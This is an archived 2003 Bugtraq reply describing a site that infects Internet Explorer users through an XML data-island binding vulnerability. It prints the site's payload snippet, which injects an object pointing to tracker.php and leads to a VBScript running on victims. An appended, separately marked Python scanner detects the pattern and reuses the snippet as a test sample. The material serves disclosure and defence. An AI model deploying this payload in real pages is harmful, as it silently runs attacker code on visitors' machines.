[31733] in bugtraq


RE: [Fwd: Re: AIM Password theft]

daemon@ATHENA.MIT.EDU (S G Masood)
Wed Sep 24 12:14:27 2003

Message-ID: <20030923225023.19769.qmail@web11008.mail.yahoo.com>
Date: Tue, 23 Sep 2003 15:50:23 -0700 (PDT)
From: S G Masood <sgmasood@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Hi Mark,

www.Haxr.org uses the "XML Page Object Type Validation
Vulnerability" [1] to infect IE users automatically.
Here is the code from the site:


<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>

This is almost an exact copy of the PoC exploit posted
for this vuln.

tracker.php points to the exec.vbs script that you
posted. This finally gets executed on the victim
machine and does its stuff.

>If this is new, it's going to spread like wildfire.

It will infect many machines but IMO, it wouldn't
exactly spread like "wildfire" 'coz it has a "single
point of failure". Have you considered complaining to
the hosting service of www.haxr.org?


--
Regards,
S.G.Masood

Hyderabad,
India
--

__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
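The pattern the message quotes (a `span` with `datasrc`, `datafld` and `dataformatas="html"` bound to an `xml` data island whose field carries markup inside CDATA) is specific enough that a content scanner can flag it in fetched or proxied pages. The following is an added example for such a scanner; it is not code from the original post or from any party the post mentions. The first sample page is constructed from the snippet quoted above, and the two benign samples are constructed to show what the check deliberately ignores.

```python
"""
Flag IE-style XML data-island bindings that render HTML from a field.

Heuristic: a <span>/<div> with datasrc="#id", a datafld, and
dataformatas="html" is bound to <xml id="id">; if the bound field's
text (CDATA-wrapped or raw) contains tags, report the island, the field
and the tag names found. Regex-based so it does not depend on how a
particular HTML parser treats CDATA outside of SVG/MathML.
"""
import re
from typing import Dict, List

# Constructed sample page, built from the snippet quoted in the post.
SAMPLE_PAGE = """<html><body>
<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>
</body></html>"""

# Constructed benign samples: no dataformatas=html, or html but no markup.
BENIGN_TEXT_BINDING = """<span datasrc="#prices" datafld="amount"></span>
<xml id="prices"><row><amount>42</amount></row></xml>"""

BENIGN_HTML_BINDING = """<div datasrc="#notes" datafld="body" dataformatas="html"></div>
<xml id="notes"><row><body>plain text only</body></row></xml>"""

TAG_RE = re.compile(r"<(span|div)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
MARKUP_RE = re.compile(r"<\s*([a-zA-Z][\w:-]*)")


def _attrs(raw: str) -> Dict[str, str]:
    """Parse a tag's attribute string into a lower-cased name -> value dict."""
    out: Dict[str, str] = {}
    for m in ATTR_RE.finditer(raw):
        value = next(v for v in m.groups()[1:] if v is not None)
        out[m.group(1).lower()] = value
    return out


def _island(page: str, island_id: str) -> str:
    """Return the inner text of <xml id="island_id">...</xml>, or '' if absent."""
    pat = re.compile(
        r"<xml\b[^>]*\bid\s*=\s*[\"']?" + re.escape(island_id)
        + r"[\"']?[^>]*>(.*?)</xml\s*>",
        re.I | re.S,
    )
    m = pat.search(page)
    return m.group(1) if m else ""


def _field_text(island: str, field: str) -> str:
    """Return the text of the first <field>...</field> element in the island."""
    pat = re.compile(
        r"<" + re.escape(field) + r"\b[^>]*>(.*?)</" + re.escape(field) + r"\s*>",
        re.I | re.S,
    )
    m = pat.search(island)
    return m.group(1) if m else ""


def scan(page: str) -> List[Dict[str, object]]:
    """Return one finding per HTML-formatted binding whose field carries markup."""
    findings: List[Dict[str, object]] = []
    for tag in TAG_RE.finditer(page):
        a = _attrs(tag.group(2))
        src, fld = a.get("datasrc", ""), a.get("datafld")
        if not src.startswith("#") or not fld:
            continue
        # Without dataformatas=html the value is inserted as text, so skip it.
        if a.get("dataformatas", "text").lower() != "html":
            continue
        body = _field_text(_island(page, src[1:]), fld)
        # Markup may be wrapped in CDATA (as on the page) or sit raw in the field.
        payload = "".join(CDATA_RE.findall(body)) or body
        tags = sorted({t.lower() for t in MARKUP_RE.findall(payload)})
        if tags:
            findings.append({"element": tag.group(1).lower(), "island": src[1:],
                             "field": fld, "tags": tags})
    return findings


if __name__ == "__main__":
    for name, page in [("sample", SAMPLE_PAGE), ("text-binding", BENIGN_TEXT_BINDING),
                       ("html-binding", BENIGN_HTML_BINDING)]:
        print(name, scan(page))
```

The scanner only reports bindings that both request HTML rendering and actually carry tags, so ordinary data islands used for text display produce no findings; the tag list in each finding is what an analyst would triage first.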
